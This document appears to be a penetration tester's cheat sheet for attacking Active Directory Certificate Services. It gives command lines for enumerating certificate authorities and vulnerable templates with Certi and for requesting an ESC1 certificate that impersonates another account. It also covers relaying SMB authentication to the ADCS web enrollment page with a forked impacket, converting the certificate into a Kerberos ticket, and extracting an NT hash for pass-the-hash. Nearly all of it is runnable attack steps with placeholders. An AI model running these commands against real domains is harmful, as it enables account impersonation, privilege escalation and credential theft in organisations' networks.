Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
git clone https://github.com/eloypgz/certi
cd certi
sudo python3 setup.py install
Certi only support kerberos auth, so to perform authenticated enumeration, you need to fetch a TGT for a valid user first.
getTGT.py '<domain>/<username>:<password>' -dc-ip <dc-ip>
Set the env var to the output ccache
export KRB5CCNAME=<username>.ccache
Enumerate Certificate Authorities on the domain (CA's)
python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca
Enumerate CA Services on the domain (Actual server names)
python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class service
Enumerate vuln templates
python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable
Requesting a cert with an alt subject name (ESC1)
python3 certi.py req '<domain>/<username>@<ca-server>' <ca-service-name> -k -n --dc-ip <dc-ip> --template <vuln-template> --alt-name <target-domain-account>
Relaying incoming SMB connection to ADCS to generate a certificate on
Fetch and install a custom fork of impacket
git clone https://github.com/ExAndroidDev/impacket.git
cd impacket
git checkout ntlmrelayx-adcs-attack
Create a virtual python env to contain this version of impacket (Avoid breaking the release you already have installed)
apt install python3-venv
python3 -m venv adcs-impacket
Move "into" this virutal env
source adcs-impacket/bin/activate
Still inside the impacket folder
pip3 install .
You can now setup ntlmrelay for realying
python3 examples/ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>
Request an TGT on behalf of the account
python3 gettgtpkinit.py <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache
Set the env var to the output TGT ccache
export KRB5CCNAME=out_tgt.ccache
Get an NTHash for Pass-The-Hash from TGT, AS-REP-KEY-ENC is from the output of the command above.
python3 getnthash.py -key <AS-REP-ENC-KEY> -dc-ip <dc-ip> <domain>/<username>